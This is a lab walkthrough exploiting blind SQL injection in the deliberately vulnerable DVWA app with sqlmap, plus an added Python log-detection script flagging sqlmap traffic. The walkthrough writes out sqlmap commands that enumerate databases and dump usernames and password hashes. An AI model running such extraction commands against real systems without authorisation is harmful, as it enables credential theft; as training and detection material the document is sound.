DVWA: Damn Vulnerable Web Application Blind SQL Injection Walkthrough with SQLMap (Low Security)

 "Disclaimer: The information provided in this article is intended for educational and research purposes only. It is not intended to promote or encourage any illegal or unethical activities. Always act responsibly and obtain proper consent before using any tools or techniques described in this article."


In this article we’ll hack DVWA’s Blind SQL Injection with the help of SQLMap, one of the most powerful tools in our toolbelt.

As always, you can read all of the DVWA articles here.




To find the cookie values and to monitor sqlmap activity, it’s best to use a proxy. We are going to use OWASP ZAP as the proxy (you can also try Burp Suite).

Log in to your Kali Linux box and DVWA. Now open OWASP ZAP and click the Firefox button:




Now navigate to the DVWA web page, log in, set the security to ‘low’ and go to SQL Injection (Blind).




Now enter 1 in the user id field and click submit. It will show something like this:




Now, if we enter 10 in the user id field and click submit, it will report that the user id is missing from the database.





I’m not going to cover why or how a SQL Injection is blind or not, but you can read about it here. For a simple SQLMap cheatsheet, read this.


Now we need some parameters for SQLMap, and these are displayed in ZAP.




It’s a GET request with parameters in the URL and a cookie. Open a terminal window and type ‘sqlmap --help’:




We’re now ready to start the attack. We’ll have to create our command with the right parameters:

sqlmap -u "http://10.0.2.6/dvwa/vulnerabilities/sqli_blind/?id=10&Submit=Submit" --cookie="security=low; PHPSESSID=iola6p2fgtlppfkj09pvuenau1" --dbs


--dbs is used to enumerate the databases on the server. After scanning, we found 2 databases:



Now we have 2 databases. As we know, the information_schema database is commonly found in MySQL, so our main focus is on dvwa, which we will try to extract:

sqlmap -u "http://10.0.2.6/dvwa/vulnerabilities/sqli_blind/?id=10&Submit=Submit" --cookie="security=low; PHPSESSID=iola6p2fgtlppfkj09pvuenau1" -D dvwa --tables

This will give us the list of tables in the database:



Now we have 2 tables, guestbook and users. We will now target the users table and try to extract its columns.

sqlmap -u "http://10.0.2.6/dvwa/vulnerabilities/sqli_blind/?id=10&Submit=Submit" --cookie="security=low; PHPSESSID=iola6p2fgtlppfkj09pvuenau1" -D dvwa -T users --columns




Now that we have extracted the columns, we will dump the user and password columns.

sqlmap -u "http://10.0.2.6/dvwa/vulnerabilities/sqli_blind/?id=10&Submit=Submit" --cookie="security=low; PHPSESSID=iola6p2fgtlppfkj09pvuenau1" -D dvwa -T users -C user,password --dump
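
Seen from the defender's side, the requests produced by the commands above stand out in the web server's access log. The following Python script is an added example, not part of the original walkthrough: the log lines, client addresses and sqlmap version string are constructed, the function names are hypothetical, and it assumes Apache combined log format and that legitimate use only submits a numeric user id (as with 1 and 10 above).

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (Apache combined format); not from the original page.
SAMPLE_LOG = '''\
10.0.2.15 - - [01/Jan/2024:10:00:00 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 1500 "-" "Mozilla/5.0"
10.0.2.15 - - [01/Jan/2024:10:00:05 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=10&Submit=Submit HTTP/1.1" 200 1500 "-" "Mozilla/5.0"
10.0.2.4 - - [01/Jan/2024:10:01:00 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=10&Submit=Submit HTTP/1.1" 200 1500 "-" "sqlmap/1.7 (https://sqlmap.org)"
10.0.2.4 - - [01/Jan/2024:10:01:01 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=10%27&Submit=Submit HTTP/1.1" 200 1500 "-" "Mozilla/5.0"
10.0.2.4 - - [01/Jan/2024:10:01:02 +0000] "GET /dvwa/login.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
'''

# Captures: client address, request target, User-Agent.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d+ \S+ "[^"]*" "([^"]*)"')
ENDPOINT = "/vulnerabilities/sqli_blind/"  # path used in the walkthrough's commands

def flag_requests(log_text):
    """Return (line number, client, reasons) for suspicious hits on the endpoint."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        client, target, agent = m.groups()
        url = urlsplit(target)
        if ENDPOINT not in url.path:
            continue
        reasons = []
        # sqlmap's default User-Agent names the tool.
        if "sqlmap" in agent.lower():
            reasons.append("sqlmap user-agent")
        # Assumption: a legitimate id is digits only, so anything else is anomalous.
        ids = parse_qs(url.query, keep_blank_values=True).get("id", [])
        if any(not re.fullmatch(r"[0-9]+", v) for v in ids):
            reasons.append("non-numeric id")
        if reasons:
            findings.append((lineno, client, reasons))
    return findings

def repeat_offenders(findings, threshold=2):
    """Clients with at least `threshold` flagged requests."""
    counts = Counter(client for _, client, _ in findings)
    return sorted(c for c, n in counts.items() if n >= threshold)

if __name__ == "__main__":
    hits = flag_requests(SAMPLE_LOG)
    print(hits, repeat_offenders(hits))
```

The non-numeric id rule does not depend on the User-Agent, so it still fires on the fourth sample line, where the client presents a browser string.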




If you got stuck or have any questions, leave a comment, and I’ll do my best to get back to you.
